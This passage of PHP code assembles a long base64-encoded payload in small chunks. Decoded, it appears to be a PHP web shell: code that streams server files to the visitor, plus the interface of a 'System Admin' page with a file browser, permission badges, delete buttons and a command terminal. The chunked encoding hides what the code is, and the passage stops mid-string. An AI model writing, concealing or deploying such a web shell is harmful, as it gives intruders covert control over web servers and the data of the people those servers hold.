$z .= "JGZwID0gZm9wZW4oJGZpbGUsICdyYi";
$z .= "cpOw0KICAgICAgICAgICAgd2hpbGUg";
$z .= "KCFmZW9mKCRmcCkpIHsNCiAgICAgIC";
$z .= "AgICAgICAgICBlY2hvIGZyZWFkKCRm";
$z .= "cCwgODE5Mik7DQogICAgICAgICAgIC";
$z .= "AgICAgZmx1c2goKTsNCiAgICAgICAg";
$z .= "ICAgIH0NCiAgICAgICAgICAgIGZjbG";
$z .= "9zZSgkZnApOw0KICAgICAgICB9DQog";
$z .= "ICAgICAgIGV4aXQ7DQogICAgfQ0KfQ";
$z .= "0KDQokbWVzc2FnZSA9ICRfU0VTU0lP";
$z .= "TlsnbWVzc2FnZSddID8/ICcnOw0KJG";
$z .= "Vycm9yID0gJF9TRVNTSU9OWydlcnJv";
$z .= "ciddID8/ICcnOw0KdW5zZXQoJF9TRV";
$z .= "NTSU9OWydtZXNzYWdlJ10sICRfU0VT";
$z .= "U0lPTlsnZXJyb3InXSk7DQo/Pg0KDQ";
$z .= "o8IURPQ1RZUEUgaHRtbD4NCjxodG1s";
$z .= "IGxhbmc9ImVuIj4NCjxoZWFkPg0KIC";
$z .= "AgIDxtZXRhIGNoYXJzZXQ9IlVURi04";
$z .= "Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aW";
$z .= "V3cG9ydCIgY29udGVudD0id2lkdGg9";
$z .= "ZGV2aWNlLXdpZHRoLCBpbml0aWFsLX";
$z .= "NjYWxlPTEuMCI+DQogICAgPHRpdGxl";
$z .= "PlN5c3RlbSBBZG1pbjwvdGl0bGU+DQ";
$z .= "ogICAgPHN0eWxlPg0KICAgICAgICAv";
$z .= "KiA9PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT09PT09PT09PT09";
$z .= "PSAqLw0KICAgICAgICAvKiBNT0RJRk";
$z .= "lFRCBDU1MgLSBUUkFOU1BBUkVOVCBC";
$z .= "QUNLR1JPVU5EIE9OTFkgICAqLw0KIC";
$z .= "AgICAgICAvKiBQSFAgRlVOQ1RJT05T";
$z .= "IDEwMCUgT1JJR0lOQUwgLSBOTyBDSE";
$z .= "FOR0VTICAgICAqLw0KICAgICAgICAv";
$z .= "KiA9PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT09PT09PT09PT09";
$z .= "PSAqLw0KICAgICAgICAqIHsNCiAgIC";
$z .= "AgICAgICAgIG1hcmdpbjogMDsNCiAg";
$z .= "ICAgICAgICAgIHBhZGRpbmc6IDA7DQ";
$z .= "ogICAgICAgICAgICBib3gtc2l6aW5n";
$z .= "OiBib3JkZXItYm94Ow0KICAgICAgIC";
$z .= "B9DQoNCiAgICAgICAgOnJvb3Qgew0K";
$z .= "ICAgICAgICAgICAgLS1wcmltYXJ5Oi";
$z .= "AjMjE5NmYzOw0KICAgICAgICAgICAg";
$z .= "LS1wcmltYXJ5LWRhcms6ICMxOTc2ZD";
$z .= "I7DQogICAgICAgICAgICAtLXByaW1h";
$z .= "cnktbGlnaHQ6ICM2NGI1ZjY7DQogIC";
$z .= "AgICAgICAgICAtLXNlY29uZGFyeTog";
$z .= "IzAwYmNkNDsNCiAgICAgICAgICAgIC";
$z .= "0tYWNjZW50OiAjZmY5ODAwOw0KICAg";
$z .= "ICAgICAgICAgLS10ZXh0OiAjZmZmZm";
$z .= "ZmOw0KICAgICAgICAgICAgLS10ZXh0";
$z .= "LXNlY29uZGFyeTogI2UwZjJmZTsNCi";
$z .= "AgICAgICAgICAgIC0tYm9yZGVyOiBy";
$z .= "Z2JhKDMzLCAxNTAsIDI0MywgMC40KT";
$z .= "sNCiAgICAgICAgICAgIC0tc3VjY2Vz";
$z .= "czogIzRjYWY1MDsNCiAgICAgICAgIC";
$z .= "AgIC0tZXJyb3I6ICNmNDQzMzY7DQog";
$z .= "ICAgICAgIH0NCg0KICAgICAgICBib2";
$z .= "R5IHsNCiAgICAgICAgICAgIGZvbnQt";
$z .= "ZmFtaWx5OiAnQ291cmllciBOZXcnLC";
$z .= "Btb25vc3BhY2U7DQogICAgICAgICAg";
$z .= "ICBiYWNrZ3JvdW5kOiB1cmwoJ2h0dH";
$z .= "BzOi8vaS5pYmIuY28vajlKVmdGNW0v";
$z .= "YnVydW5nLmpwZycpIG5vLXJlcGVhdC";
$z .= "BjZW50ZXIgY2VudGVyIGZpeGVkOw0K";
$z .= "ICAgICAgICAgICAgYmFja2dyb3VuZC";
$z .= "1zaXplOiBjb3ZlcjsNCiAgICAgICAg";
$z .= "ICAgIHBhZGRpbmc6IDIwcHg7DQogIC";
$z .= "AgICAgICAgICBtaW4taGVpZ2h0OiAx";
$z .= "MDB2aDsNCiAgICAgICAgfQ0KDQogIC";
$z .= "AgICAgIC8qIEdMQVNTIE1PUlBISVNN";
$z .= "IEVGRkVDVCAtIFRSQU5TUEFSRU5UIC";
$z .= "ovDQogICAgICAgIC5jb250YWluZXIg";
$z .= "ew0KICAgICAgICAgICAgbWF4LXdpZH";
$z .= "RoOiAxNDAwcHg7DQogICAgICAgICAg";
$z .= "ICBtYXJnaW46IDAgYXV0bzsNCiAgIC";
$z .= "AgICAgfQ0KDQogICAgICAgIC5oZWFk";
$z .= "ZXIsIC5wYXRoLW5hdiwgLmZpbGUtdG";
$z .= "FibGUsIC50ZXJtaW5hbCwgLnN5c3Rl";
$z .= "bS1pbmZvLCANCiAgICAgICAgLnRhYn";
$z .= "MsIFtzdHlsZSo9ImJhY2tncm91bmQ6";
$z .= "IHZhcigtLXN1cmZhY2UpIl0gew0KIC";
$z .= "AgICAgICAgICAgYmFja2dyb3VuZDog";
$z .= "cmdiYSgxMCwgMjUsIDQ3LCAwLjcpIC";
$z .= "FpbXBvcnRhbnQ7DQogICAgICAgICAg";
$z .= "ICBiYWNrZHJvcC1maWx0ZXI6IGJsdX";
$z .= "IoMTBweCk7DQogICAgICAgICAgICBi";
$z .= "b3JkZXI6IDFweCBzb2xpZCByZ2JhKD";
$z .= "MzLCAxNTAsIDI0MywgMC40KTsNCiAg";
$z .= "ICAgICAgfQ0KDQogICAgICAgIC5oZW";
$z .= "FkZXIgew0KICAgICAgICAgICAgYm9y";
$z .= "ZGVyLXJhZGl1czogMTZweDsNCiAgIC";
$z .= "AgICAgICAgIHBhZGRpbmc6IDIwcHg7";
$z .= "DQogICAgICAgICAgICBtYXJnaW4tYm";
$z .= "90dG9tOiAyMHB4Ow0KICAgICAgICAg";
$z .= "ICAgZGlzcGxheTogZmxleDsNCiAgIC";
$z .= "AgICAgICAgIGFsaWduLWl0ZW1zOiBj";
$z .= "ZW50ZXI7DQogICAgICAgICAgICBqdX";
$z .= "N0aWZ5LWNvbnRlbnQ6IHNwYWNlLWJl";
$z .= "dHdlZW47DQogICAgICAgICAgICBmbG";
$z .= "V4LXdyYXA6IHdyYXA7DQogICAgICAg";
$z .= "ICAgICBnYXA6IDIwcHg7DQogICAgIC";
$z .= "AgICAgICBib3gtc2hhZG93OiAwIDRw";
$z .= "eCAyMHB4IHJnYmEoMCwwLDAsMC4zKT";
$z .= "sNCiAgICAgICAgfQ0KDQogICAgICAg";
$z .= "IC5sb2dvIHsNCiAgICAgICAgICAgIG";
$z .= "Rpc3BsYXk6IGZsZXg7DQogICAgICAg";
$z .= "ICAgICBhbGlnbi1pdGVtczogY2VudG";
$z .= "VyOw0KICAgICAgICAgICAgZ2FwOiAx";
$z .= "NXB4Ow0KICAgICAgICB9DQoNCiAgIC";
$z .= "AgICAgLmxvZ28taWNvbiB7DQogICAg";
$z .= "ICAgICAgICB3aWR0aDogNDhweDsNCi";
$z .= "AgICAgICAgICAgIGhlaWdodDogNDhw";
$z .= "eDsNCiAgICAgICAgICAgIGJhY2tncm";
$z .= "91bmQ6IGxpbmVhci1ncmFkaWVudCgx";
$z .= "MzVkZWcsIHZhcigtLXByaW1hcnkpLC";
$z .= "B2YXIoLS1zZWNvbmRhcnkpKTsNCiAg";
$z .= "ICAgICAgICAgIGJvcmRlci1yYWRpdX";
$z .= "M6IDEycHg7DQogICAgICAgICAgICBk";
$z .= "aXNwbGF5OiBmbGV4Ow0KICAgICAgIC";
$z .= "AgICAgYWxpZ24taXRlbXM6IGNlbnRl";
$z .= "cjsNCiAgICAgICAgICAgIGp1c3RpZn";
$z .= "ktY29udGVudDogY2VudGVyOw0KICAg";
$z .= "ICAgICAgICAgZm9udC1zaXplOiAyNH";
$z .= "B4Ow0KICAgICAgICB9DQoNCiAgICAg";
$z .= "ICAgLmxvZ28tdGV4dCBoMSB7DQogIC";
$z .= "AgICAgICAgICBmb250LXNpemU6IDI0";
$z .= "cHg7DQogICAgICAgICAgICBiYWNrZ3";
$z .= "JvdW5kOiBsaW5lYXItZ3JhZGllbnQo";
$z .= "MTM1ZGVnLCB2YXIoLS1wcmltYXJ5LW";
$z .= "xpZ2h0KSwgdmFyKC0tc2Vjb25kYXJ5";
$z .= "KSk7DQogICAgICAgICAgICAtd2Via2";
$z .= "l0LWJhY2tncm91bmQtY2xpcDogdGV4";
$z .= "dDsNCiAgICAgICAgICAgIC13ZWJraX";
$z .= "QtdGV4dC1maWxsLWNvbG9yOiB0cmFu";
$z .= "c3BhcmVudDsNCiAgICAgICAgfQ0KDQ";
$z .= "ogICAgICAgIC5sb2dvLXRleHQgc3Bh";
$z .= "biB7DQogICAgICAgICAgICBjb2xvcj";
$z .= "ogdmFyKC0tdGV4dC1zZWNvbmRhcnkp";
$z .= "Ow0KICAgICAgICAgICAgZm9udC1zaX";
$z .= "plOiAxMnB4Ow0KICAgICAgICB9DQoN";
$z .= "CiAgICAgICAgLnN0YXRzIHsNCiAgIC";
$z .= "AgICAgICAgIGRpc3BsYXk6IGZsZXg7";
$z .= "DQogICAgICAgICAgICBnYXA6IDMwcH";
$z .= "g7DQogICAgICAgIH0NCg0KICAgICAg";
$z .= "ICAuc3RhdC12YWx1ZSB7DQogICAgIC";
$z .= "AgICAgICBmb250LXNpemU6IDIwcHg7";
$z .= "DQogICAgICAgICAgICBmb250LXdlaW";
$z .= "dodDogNjAwOw0KICAgICAgICAgICAg";
$z .= "Y29sb3I6IHZhcigtLXByaW1hcnktbG";
$z .= "lnaHQpOw0KICAgICAgICB9DQoNCiAg";
$z .= "ICAgICAgLnN0YXQtbGFiZWwgew0KIC";
$z .= "AgICAgICAgICAgZm9udC1zaXplOiAx";
$z .= "MXB4Ow0KICAgICAgICAgICAgY29sb3";
$z .= "I6IHZhcigtLXRleHQtc2Vjb25kYXJ5";
$z .= "KTsNCiAgICAgICAgICAgIHRleHQtdH";
$z .= "JhbnNmb3JtOiB1cHBlcmNhc2U7DQog";
$z .= "ICAgICAgIH0NCg0KICAgICAgICAvKi";
$z .= "BNZXNzYWdlcyAqLw0KICAgICAgICAu";
$z .= "bWVzc2FnZSB7DQogICAgICAgICAgIC";
$z .= "BwYWRkaW5nOiAxNXB4IDIwcHg7DQog";
$z .= "ICAgICAgICAgICBib3JkZXItcmFkaX";
$z .= "VzOiAxMnB4Ow0KICAgICAgICAgICAg";
$z .= "bWFyZ2luLWJvdHRvbTogMjBweDsNCi";
$z .= "AgICAgICAgICAgIGFuaW1hdGlvbjog";
$z .= "c2xpZGVJbiAwLjNzOw0KICAgICAgIC";
$z .= "AgICAgYmFja2Ryb3AtZmlsdGVyOiBi";
$z .= "bHVyKDVweCk7DQogICAgICAgIH0NCg";
$z .= "0KICAgICAgICAubWVzc2FnZS1zdWNj";
$z .= "ZXNzIHsNCiAgICAgICAgICAgIGJhY2";
$z .= "tncm91bmQ6IHJnYmEoNzYsIDE3NSwg";
$z .= "ODAsIDAuMyk7DQogICAgICAgICAgIC";
$z .= "Bib3JkZXI6IDFweCBzb2xpZCB2YXIo";
$z .= "LS1zdWNjZXNzKTsNCiAgICAgICAgIC";
$z .= "AgIGNvbG9yOiAjYzhlNmM5Ow0KICAg";
$z .= "ICAgICB9DQoNCiAgICAgICAgLm1lc3";
$z .= "NhZ2UtZXJyb3Igew0KICAgICAgICAg";
$z .= "ICAgYmFja2dyb3VuZDogcmdiYSgyND";
$z .= "QsIDY3LCA1NCwgMC4zKTsNCiAgICAg";
$z .= "ICAgICAgIGJvcmRlcjogMXB4IHNvbG";
$z .= "lkIHZhcigtLWVycm9yKTsNCiAgICAg";
$z .= "ICAgICAgIGNvbG9yOiAjZmZjZGQyOw";
$z .= "0KICAgICAgICB9DQoNCiAgICAgICAg";
$z .= "QGtleWZyYW1lcyBzbGlkZUluIHsNCi";
$z .= "AgICAgICAgICAgIGZyb20geyBvcGFj";
$z .= "aXR5OiAwOyB0cmFuc2Zvcm06IHRyYW";
$z .= "5zbGF0ZVkoLTIwcHgpOyB9DQogICAg";
$z .= "ICAgICAgICB0byB7IG9wYWNpdHk6ID";
$z .= "E7IHRyYW5zZm9ybTogdHJhbnNsYXRl";
$z .= "WSgwKTsgfQ0KICAgICAgICB9DQoNCi";
$z .= "AgICAgICAgLyogUGF0aCBOYXZpZ2F0";
$z .= "aW9uICovDQogICAgICAgIC5wYXRoLW";
$z .= "5hdiB7DQogICAgICAgICAgICBib3Jk";
$z .= "ZXItcmFkaXVzOiAxMnB4Ow0KICAgIC";
$z .= "AgICAgICAgcGFkZGluZzogMTJweCAy";
$z .= "MHB4Ow0KICAgICAgICAgICAgbWFyZ2";
$z .= "luLWJvdHRvbTogMjBweDsNCiAgICAg";
$z .= "ICAgICAgIGRpc3BsYXk6IGZsZXg7DQ";
$z .= "ogICAgICAgICAgICBhbGlnbi1pdGVt";
$z .= "czogY2VudGVyOw0KICAgICAgICAgIC";
$z .= "AgZmxleC13cmFwOiB3cmFwOw0KICAg";
$z .= "ICAgICAgICAgZ2FwOiA4cHg7DQogIC";
$z .= "AgICAgICAgICBvdmVyZmxvdy14OiBh";
$z .= "dXRvOw0KICAgICAgICB9DQoNCiAgIC";
$z .= "AgICAgLnBhdGgtaXRlbSB7DQogICAg";
$z .= "ICAgICAgICBjb2xvcjogdmFyKC0tdG";
$z .= "V4dC1zZWNvbmRhcnkpOw0KICAgICAg";
$z .= "ICAgICAgdGV4dC1kZWNvcmF0aW9uOi";
$z .= "Bub25lOw0KICAgICAgICAgICAgcGFk";
$z .= "ZGluZzogNXB4IDEycHg7DQogICAgIC";
$z .= "AgICAgICBib3JkZXItcmFkaXVzOiA2";
$z .= "cHg7DQogICAgICAgICAgICB0cmFuc2";
$z .= "l0aW9uOiAwLjJzOw0KICAgICAgICAg";
$z .= "ICAgZm9udC1zaXplOiAxM3B4Ow0KIC";
$z .= "AgICAgICB9DQoNCiAgICAgICAgLnBh";
$z .= "dGgtaXRlbTpob3ZlciB7DQogICAgIC";
$z .= "AgICAgICBiYWNrZ3JvdW5kOiB2YXIo";
$z .= "LS1wcmltYXJ5LWRhcmspOw0KICAgIC";
$z .= "AgICAgICAgY29sb3I6IHdoaXRlOw0K";
$z .= "ICAgICAgICB9DQoNCiAgICAgICAgLn";
$z .= "BhdGgtY3VycmVudCB7DQogICAgICAg";
$z .= "ICAgICBiYWNrZ3JvdW5kOiB2YXIoLS";
$z .= "1wcmltYXJ5KTsNCiAgICAgICAgICAg";
$z .= "IGNvbG9yOiB3aGl0ZTsNCiAgICAgIC";
$z .= "AgICAgIGZvbnQtd2VpZ2h0OiA1MDA7";
$z .= "DQogICAgICAgIH0NCg0KICAgICAgIC";
$z .= "AvKiBUb29sYmFyICovDQogICAgICAg";
$z .= "IC50b29sYmFyIHsNCiAgICAgICAgIC";
$z .= "AgIGRpc3BsYXk6IGZsZXg7DQogICAg";
$z .= "ICAgICAgICBnYXA6IDEycHg7DQogIC";
$z .= "AgICAgICAgICBtYXJnaW4tYm90dG9t";
$z .= "OiAyMHB4Ow0KICAgICAgICAgICAgZm";
$z .= "xleC13cmFwOiB3cmFwOw0KICAgICAg";
$z .= "ICB9DQoNCiAgICAgICAgLmJ0biB7DQ";
$z .= "ogICAgICAgICAgICBwYWRkaW5nOiAx";
$z .= "MHB4IDIwcHg7DQogICAgICAgICAgIC";
$z .= "Bib3JkZXI6IG5vbmU7DQogICAgICAg";
$z .= "ICAgICBib3JkZXItcmFkaXVzOiAxMH";
$z .= "B4Ow0KICAgICAgICAgICAgZm9udC1z";
$z .= "aXplOiAxNHB4Ow0KICAgICAgICAgIC";
$z .= "AgZm9udC13ZWlnaHQ6IDUwMDsNCiAg";
$z .= "ICAgICAgICAgIGN1cnNvcjogcG9pbn";
$z .= "RlcjsNCiAgICAgICAgICAgIHRyYW5z";
$z .= "aXRpb246IDAuMnM7DQogICAgICAgIC";
$z .= "AgICBiYWNrZ3JvdW5kOiByZ2JhKDEw";
$z .= "LCAyNSwgNDcsIDAuOCk7DQogICAgIC";
$z .= "AgICAgICBjb2xvcjogdmFyKC0tdGV4";
$z .= "dCk7DQogICAgICAgICAgICBib3JkZX";
$z .= "I6IDFweCBzb2xpZCByZ2JhKDMzLCAx";
$z .= "NTAsIDI0MywgMC41KTsNCiAgICAgIC";
$z .= "AgICAgIGRpc3BsYXk6IGlubGluZS1m";
$z .= "bGV4Ow0KICAgICAgICAgICAgYWxpZ2";
$z .= "4taXRlbXM6IGNlbnRlcjsNCiAgICAg";
$z .= "ICAgICAgIGdhcDogOHB4Ow0KICAgIC";
$z .= "AgICAgICAgdGV4dC1kZWNvcmF0aW9u";
$z .= "OiBub25lOw0KICAgICAgICAgICAgYm";
$z .= "Fja2Ryb3AtZmlsdGVyOiBibHVyKDVw";
$z .= "eCk7DQogICAgICAgIH0NCg0KICAgIC";
$z .= "AgICAuYnRuOmhvdmVyIHsNCiAgICAg";
$z .= "ICAgICAgIGJhY2tncm91bmQ6IHZhci";
$z .= "gtLXByaW1hcnkpOw0KICAgICAgICAg";
$z .= "ICAgYm9yZGVyLWNvbG9yOiB2YXIoLS";
$z .= "1wcmltYXJ5LWxpZ2h0KTsNCiAgICAg";
$z .= "ICAgICAgIHRyYW5zZm9ybTogdHJhbn";
$z .= "NsYXRlWSgtMnB4KTsNCiAgICAgICAg";
$z .= "ICAgIGJveC1zaGFkb3c6IDAgNHB4ID";
$z .= "E1cHggcmdiYSgzMywgMTUwLCAyNDMs";
$z .= "IDAuMyk7DQogICAgICAgIH0NCg0KIC";
$z .= "AgICAgICAuYnRuLXByaW1hcnkgew0K";
$z .= "ICAgICAgICAgICAgYmFja2dyb3VuZD";
$z .= "ogbGluZWFyLWdyYWRpZW50KDEzNWRl";
$z .= "ZywgIzIxOTZmMywgIzBkNDdhMSk7DQ";
$z .= "ogICAgICAgICAgICBib3JkZXI6IG5v";
$z .= "bmU7DQogICAgICAgIH0NCg0KICAgIC";
$z .= "AgICAuYnRuLXN1Y2Nlc3Mgew0KICAg";
$z .= "ICAgICAgICAgYmFja2dyb3VuZDogbG";
$z .= "luZWFyLWdyYWRpZW50KDEzNWRlZywg";
$z .= "IzJlN2QzMiwgIzRjYWY1MCk7DQogIC";
$z .= "AgICAgICAgICBib3JkZXI6IG5vbmU7";
$z .= "DQogICAgICAgIH0NCg0KICAgICAgIC";
$z .= "Auc2VhcmNoLWJveCB7DQogICAgICAg";
$z .= "ICAgICBmbGV4OiAxOw0KICAgICAgIC";
$z .= "AgICAgbWluLXdpZHRoOiAyNTBweDsN";
$z .= "CiAgICAgICAgICAgIHBhZGRpbmc6ID";
$z .= "EwcHggMjBweDsNCiAgICAgICAgICAg";
$z .= "IGJhY2tncm91bmQ6IHJnYmEoMTAsID";
$z .= "I1LCA0NywgMC43KTsNCiAgICAgICAg";
$z .= "ICAgIGJvcmRlcjogMXB4IHNvbGlkIH";
$z .= "JnYmEoMzMsIDE1MCwgMjQzLCAwLjUp";
$z .= "Ow0KICAgICAgICAgICAgYm9yZGVyLX";
$z .= "JhZGl1czogMTBweDsNCiAgICAgICAg";
$z .= "ICAgIGNvbG9yOiB3aGl0ZTsNCiAgIC";
$z .= "AgICAgICAgIGZvbnQtc2l6ZTogMTRw";
$z .= "eDsNCiAgICAgICAgfQ0KDQogICAgIC";
$z .= "AgIC5zZWFyY2gtYm94OmZvY3VzIHsN";
$z .= "CiAgICAgICAgICAgIG91dGxpbmU6IG";
$z .= "5vbmU7DQogICAgICAgICAgICBib3Jk";
$z .= "ZXItY29sb3I6IHZhcigtLXByaW1hcn";
$z .= "kpOw0KICAgICAgICB9DQoNCiAgICAg";
$z .= "ICAgLyogRmlsZSBUYWJsZSAqLw0KIC";
$z .= "AgICAgICAuZmlsZS10YWJsZSB7DQog";
$z .= "ICAgICAgICAgICB3aWR0aDogMTAwJT";
$z .= "sNCiAgICAgICAgICAgIGJvcmRlci1y";
$z .= "YWRpdXM6IDE2cHg7DQogICAgICAgIC";
$z .= "AgICBvdmVyZmxvdzogaGlkZGVuOw0K";
$z .= "ICAgICAgICAgICAgbWFyZ2luLWJvdH";
$z .= "RvbTogMjBweDsNCiAgICAgICAgfQ0K";
$z .= "DQogICAgICAgIC5maWxlLXRhYmxlIH";
$z .= "RoIHsNCiAgICAgICAgICAgIGJhY2tn";
$z .= "cm91bmQ6IHJnYmEoMCwgMCwgMCwgMC";
$z .= "41KTsNCiAgICAgICAgICAgIHBhZGRp";
$z .= "bmc6IDE1cHggMjBweDsNCiAgICAgIC";
$z .= "AgICAgIHRleHQtYWxpZ246IGxlZnQ7";
$z .= "DQogICAgICAgICAgICBmb250LXdlaW";
$z .= "dodDogNjAwOw0KICAgICAgICAgICAg";
$z .= "Y29sb3I6IHZhcigtLXByaW1hcnktbG";
$z .= "lnaHQpOw0KICAgICAgICAgICAgYm9y";
$z .= "ZGVyLWJvdHRvbTogMnB4IHNvbGlkIH";
$z .= "ZhcigtLXByaW1hcnkpOw0KICAgICAg";
$z .= "ICB9DQoNCiAgICAgICAgLmZpbGUtdG";
$z .= "FibGUgdGQgew0KICAgICAgICAgICAg";
$z .= "cGFkZGluZzogMTJweCAyMHB4Ow0KIC";
$z .= "AgICAgICAgICAgYm9yZGVyLWJvdHRv";
$z .= "bTogMXB4IHNvbGlkIHJnYmEoMzMsID";
$z .= "E1MCwgMjQzLCAwLjIpOw0KICAgICAg";
$z .= "ICAgICAgY29sb3I6IHZhcigtLXRleH";
$z .= "QpOw0KICAgICAgICB9DQoNCiAgICAg";
$z .= "ICAgLmZpbGUtdGFibGUgdHI6aG92ZX";
$z .= "IgdGQgew0KICAgICAgICAgICAgYmFj";
$z .= "a2dyb3VuZDogcmdiYSgzMywgMTUwLC";
$z .= "AyNDMsIDAuMik7DQogICAgICAgIH0N";
$z .= "Cg0KICAgICAgICAuZmlsZS1uYW1lIH";
$z .= "sNCiAgICAgICAgICAgIGRpc3BsYXk6";
$z .= "IGZsZXg7DQogICAgICAgICAgICBhbG";
$z .= "lnbi1pdGVtczogY2VudGVyOw0KICAg";
$z .= "ICAgICAgICAgZ2FwOiAxMHB4Ow0KIC";
$z .= "AgICAgICAgICAgY29sb3I6IHZhcigt";
$z .= "LXRleHQpOw0KICAgICAgICAgICAgdG";
$z .= "V4dC1kZWNvcmF0aW9uOiBub25lOw0K";
$z .= "ICAgICAgICB9DQoNCiAgICAgICAgLm";
$z .= "ZpbGUtbmFtZTpob3ZlciB7DQogICAg";
$z .= "ICAgICAgICBjb2xvcjogdmFyKC0tcH";
$z .= "JpbWFyeS1saWdodCk7DQogICAgICAg";
$z .= "IH0NCg0KICAgICAgICAuZmlsZS1pY2";
$z .= "9uIHsNCiAgICAgICAgICAgIGZvbnQt";
$z .= "c2l6ZTogMjBweDsNCiAgICAgICAgfQ";
$z .= "0KDQogICAgICAgIC5maWxlLXNpemUg";
$z .= "ew0KICAgICAgICAgICAgY29sb3I6IH";
$z .= "ZhcigtLXRleHQtc2Vjb25kYXJ5KTsN";
$z .= "CiAgICAgICAgICAgIGZvbnQtc2l6ZT";
$z .= "ogMTJweDsNCiAgICAgICAgICAgIG1h";
$z .= "cmdpbi1sZWZ0OiA1cHg7DQogICAgIC";
$z .= "AgIH0NCg0KICAgICAgICAucGVybXMt";
$z .= "YmFkZ2Ugew0KICAgICAgICAgICAgYm";
$z .= "Fja2dyb3VuZDogcmdiYSgwLCAwLCAw";
$z .= "LCAwLjUpOw0KICAgICAgICAgICAgcG";
$z .= "FkZGluZzogNHB4IDEwcHg7DQogICAg";
$z .= "ICAgICAgICBib3JkZXItcmFkaXVzOi";
$z .= "AyMHB4Ow0KICAgICAgICAgICAgZm9u";
$z .= "dC1mYW1pbHk6IG1vbm9zcGFjZTsNCi";
$z .= "AgICAgICAgICAgIGZvbnQtc2l6ZTog";
$z .= "MTFweDsNCiAgICAgICAgICAgIGJvcm";
$z .= "RlcjogMXB4IHNvbGlkIHZhcigtLWFj";
$z .= "Y2VudCk7DQogICAgICAgICAgICBjb2";
$z .= "xvcjogdmFyKC0tYWNjZW50KTsNCiAg";
$z .= "ICAgICAgfQ0KDQogICAgICAgIC5hY3";
$z .= "Rpb24tYnRucyB7DQogICAgICAgICAg";
$z .= "ICBkaXNwbGF5OiBmbGV4Ow0KICAgIC";
$z .= "AgICAgICAgZ2FwOiA4cHg7DQogICAg";
$z .= "ICAgICAgICBmbGV4LXdyYXA6IHdyYX";
$z .= "A7DQogICAgICAgIH0NCg0KICAgICAg";
$z .= "ICAuYWN0aW9uLWJ0biB7DQogICAgIC";
$z .= "AgICAgICBwYWRkaW5nOiA0cHggMTBw";
$z .= "eDsNCiAgICAgICAgICAgIGJvcmRlci";
$z .= "1yYWRpdXM6IDZweDsNCiAgICAgICAg";
$z .= "ICAgIGZvbnQtc2l6ZTogMTFweDsNCi";
$z .= "AgICAgICAgICAgIHRleHQtZGVjb3Jh";
$z .= "dGlvbjogbm9uZTsNCiAgICAgICAgIC";
$z .= "AgIGNvbG9yOiB2YXIoLS10ZXh0KTsN";
$z .= "CiAgICAgICAgICAgIGJhY2tncm91bm";
$z .= "Q6IHJnYmEoMCwgMCwgMCwgMC41KTsN";
$z .= "CiAgICAgICAgICAgIGJvcmRlcjogMX";
$z .= "B4IHNvbGlkIHJnYmEoMzMsIDE1MCwg";
$z .= "MjQzLCAwLjUpOw0KICAgICAgICAgIC";
$z .= "AgdHJhbnNpdGlvbjogMC4yczsNCiAg";
$z .= "ICAgICAgfQ0KDQogICAgICAgIC5hY3";
$z .= "Rpb24tYnRuOmhvdmVyIHsNCiAgICAg";
$z .= "ICAgICAgIGJhY2tncm91bmQ6IHZhci";
$z .= "gtLXByaW1hcnkpOw0KICAgICAgICB9";
$z .= "DQoNCiAgICAgICAgLmRlbGV0ZS1idG";
$z .= "46aG92ZXIgew0KICAgICAgICAgICAg";
$z .= "YmFja2dyb3VuZDogdmFyKC0tZXJyb3";
$z .= "IpOw0KICAgICAgICB9DQoNCiAgICAg";
$z .= "ICAgLyogVGVybWluYWwgKi8NCiAgIC";
$z .= "AgICAgLnRlcm1pbmFsIHsNCiAgICAg";
$z .= "ICAgICAgIGJvcmRlci1yYWRpdXM6ID";
$z .= "E2cHg7DQogICAgICAgICAgICBvdmVy";
$z .= "ZmxvdzogaGlkZGVuOw0KICAgICAgIC";
$z .= "AgICAgbWFyZ2luLXRvcDogMjBweDsN";
$z .= "CiAgICAgICAgfQ0KDQogICAgICAgIC";
$z .= "50ZXJtaW5hbC1oZWFkZXIgew0KICAg";
$z .= "ICAgICAgICAgYmFja2dyb3VuZDogcm";
$z .= "diYSgwLCAwLCAwLCAwLjUpOw0KICAg";
$z .= "ICAgICAgICAgcGFkZGluZzogMTVweC";
$z .= "AyMHB4Ow0KICAgICAgICAgICAgYm9y";
$z .= "ZGVyLWJvdHRvbTogMnB4IHNvbGlkIH";
$z .= "ZhcigtLXByaW1hcnkpOw0KICAgICAg";
$z .= "ICAgICAgZGlzcGxheTogZmxleDsNCi";
$z .= "AgICAgICAgICAgIGp1c3RpZnktY29u";
$z .= "dGVudDogc3BhY2UtYmV0d2VlbjsNCi";
$z .= "AgICAgICAgICAgIGFsaWduLWl0ZW1z";
$z .= "OiBjZW50ZXI7DQogICAgICAgIH0NCg";
$z .= "0KICAgICAgICAudGVybWluYWwtdGl0";
$z .= "bGUgew0KICAgICAgICAgICAgY29sb3";
$z .= "I6IHZhcigtLXByaW1hcnktbGlnaHQp";
$z .= "Ow0KICAgICAgICAgICAgZm9udC13ZW";
$z .= "lnaHQ6IDYwMDsNCiAgICAgICAgICAg";
$z .= "IGRpc3BsYXk6IGZsZXg7DQogICAgIC";
$z .= "AgICAgICBhbGlnbi1pdGVtczogY2Vu";
$z .= "dGVyOw0KICAgICAgICAgICAgZ2FwOi";
$z .= "A4cHg7DQogICAgICAgIH0NCg0KICAg";
$z .= "ICAgICAudGVybWluYWwtY3dkIHsNCi";
$z .= "AgICAgICAgICAgIGJhY2tncm91bmQ6";
$z .= "IHJnYmEoMCwgMCwgMCwgMC41KTsNCi";
$z .= "AgICAgICAgICAgIHBhZGRpbmc6IDVw";
$z .= "eCAxNXB4Ow0KICAgICAgICAgICAgYm";
$z .= "9yZGVyLXJhZGl1czogMjBweDsNCiAg";
$z .= "ICAgICAgICAgIGZvbnQtZmFtaWx5Oi";
$z .= "Btb25vc3BhY2U7DQogICAgICAgICAg";
$z .= "ICBmb250LXNpemU6IDEycHg7DQogIC";
$z .= "AgICAgICAgICBjb2xvcjogdmFyKC0t";
$z .= "YWNjZW50KTsNCiAgICAgICAgICAgIG";
$z .= "JvcmRlcjogMXB4IHNvbGlkIHZhcigt";
$z .= "LWJvcmRlcik7DQogICAgICAgIH0NCg";
$z .= "0KICAgICAgICAudGVybWluYWwtb3V0";
$z .= "cHV0IHsNCiAgICAgICAgICAgIHBhZG";
$z .= "Rpbmc6IDIwcHg7DQogICAgICAgICAg";
$z .= "ICBtaW4taGVpZ2h0OiAyNTBweDsNCi";
$z .= "AgICAgICAgICAgIG1heC1oZWlnaHQ6";
$z .= "IDQwMHB4Ow0KICAgICAgICAgICAgb3";
